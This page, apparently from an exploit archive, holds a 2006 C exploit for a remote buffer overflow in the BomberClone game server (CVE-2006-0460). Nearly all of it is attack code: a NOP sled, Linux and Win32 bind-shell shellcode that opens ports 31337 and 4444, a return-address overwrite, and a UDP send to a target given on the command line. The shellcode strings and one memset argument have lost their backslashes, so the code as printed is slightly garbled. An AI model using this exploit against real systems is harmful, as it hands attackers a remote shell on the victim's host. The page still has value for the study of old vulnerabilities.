BomberClone < 0.11.6.2 (Error Messages) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BomberClone < 0.11.6.2 (Error Messages) Remote Buffer Overflow Exploit
# Published : 2006-03-22
# Author : esca zoo
# Previous Title : MS Internet Explorer (createTextRang) Remote Code Execution Exploit
# Next Title : crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit

/*
 * bomberclone < 0.11.6.2 remote exploit
 * CVE-2006-0460
 * 3/14/06
 * escazoo@yahoo.com
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* fork() + bind() port 31337 - ty izik */
char linux_shellcode[]= 
"x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcdx80"              
"x5bx5dx52x66xbdx69x7ax0fxcdx09xddx55x6ax10x51"                  
"x50x89xe1xb0x66xcdx80xb3x04xb0x66xcdx80x5fx50"                  
"x50x57x89xe1x43xb0x66xcdx80x93xb0x02xcdx80x85xc0"             
"x75x1ax59xb0x3fxcdx80x49x79xf9xb0x0bx68x2fx2fx73"
"x68x68x2fx62x69x6ex89xe3x52x53xebxb2x6ax06x58"                 
"xcdx80xb3x04xebxc9";            

/* bind shell to 4444 - metasploit */
char win32_shellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x36"
"xbcx74xb1x83xebxfcxe2xf4xcaxd6x9fxfcxdex45x8bx4e"
"xc9xdcxffxddx12x98xffxf4x0ax37x08xb4x4exbdx9bx3a"
"x79xa4xffxeex16xbdx9fxf8xbdx88xffxb0xd8x8dxb4x28"
"x9ax38xb4xc5x31x7dxbexbcx37x7ex9fx45x0dxe8x50x99"
"x43x59xffxeex12xbdx9fxd7xbdxb0x3fx3ax69xa0x75x5a"
"x35x90xffx38x5ax98x68xd0xf5x8dxafxd5xbdxffx44x3a"
"x76xb0xffxc1x2ax11xffxf1x3exe2x1cx3fx78xb2x98xe1"
"xc9x6ax12xe2x50xd4x47x83x5excbx07x83x69xe8x8bx61"
"x5ex77x99x4dx0dxecx8bx67x69x35x91xd7xb7x51x7cxb3"
"x63xd6x76x4exe6xd4xadxb8xc3x11x23x4exe0xefx27xe2"
"x65xefx37xe2x75xefx8bx61x50xd4x65xedx50xefxfdx50"
"xa3xd4xd0xabx46x7bx23x4exe0xd6x64xe0x63x43xa4xd9"
"x92x11x5ax58x61x43xa2xe2x63x43xa4xd9xd3xf5xf2xf8"
"x61x43xa2xe1x62xe8x21x4exe6x2fx1cx56x4fx7ax0dxe6"
"xc9x6ax21x4exe6xdax1exd5x50xd4x17xdcxbfx59x1exe1"
"x6fx95xb8x38xd1xd6x30x38xd4x8dxb4x42x9cx42x36x9c"
"xc8xfex58x22xbbxc6x4cx1ax9dx17x1cxc3xc8x0fx62x4e"
"x43xf8x8bx67x6dxebx26xe0x67xedx1exb0x67xedx21xe0"
"xc9x6cx1cx1cxefxb9xbaxe2xc9x6ax1ex4exc9x8bx8bx61"
"xbdxebx88x32xf2xd8x8bx67x64x43xa4xd9xd9x72x94xd1"
"x65x43xa2x4exe6xbcx74xb1";

struct pkgheader {
 unsigned char typ;
 unsigned char flags;
 signed short id; 
 signed short led;
} pkgheader;

struct pkg_error {
 struct pkgheader h;
 unsigned char nr;
 char text[816];
} pkg_error;

int main(int argc, char *argv[]) {
 char *ptr;
 int sockfd, i;
 long *addrptr, ret;
 struct sockaddr_in vict;
 
 if(argc < 4) {
  fprintf(stderr, "%s IP Port [target]n", argv[0]);
  return -2;
 }

 
 memset(pkg_error.text, 0x90, sizeof(pkg_error.text));
 if(!strcmp(argv[3], "win32")) {
  ret = 0x77dab1da;
  memcpy(pkg_error.text + 701 - strlen(win32_shellcode), win32_shellcode, strlen(win32_shellcode));
 }
 else {
  ret = 0xbffff164;
  memcpy(pkg_error.text + 701 - strlen(linux_shellcode), linux_shellcode, strlen(linux_shellcode));
 }
 
 pkg_error.h.typ = 0; 
 pkg_error.h.flags = 0;
 pkg_error.h.led = sizeof(struct pkg_error);
 pkg_error.nr = 'A';

 ptr = pkg_error.text + 732;
 addrptr = (long *)ptr;  
 for(i = 732; i < sizeof(pkg_error.text); i+=4)
  *(addrptr++) = ret;

 vict.sin_family = PF_INET;
 vict.sin_port = htons(atoi(argv[2]));
 vict.sin_addr.s_addr = inet_addr(argv[1]);
 memset(&(vict.sin_zero), '', 8);

 if((sockfd = socket(PF_INET, SOCK_DGRAM, 0)) < 0) {
  perror("socket");
  return -1;
 }

 if(connect(sockfd, (struct sockaddr *)&vict,
 sizeof(vict)) < 0) {
  perror("connect");
  return -1;
 }

 if(send(sockfd, &pkg_error, sizeof(pkg_error), 0) < 0) {
  perror("send");
  return -1;
 }
 
 close(sockfd); 

 return 0;
}

// www.Syue.com [2006-03-22]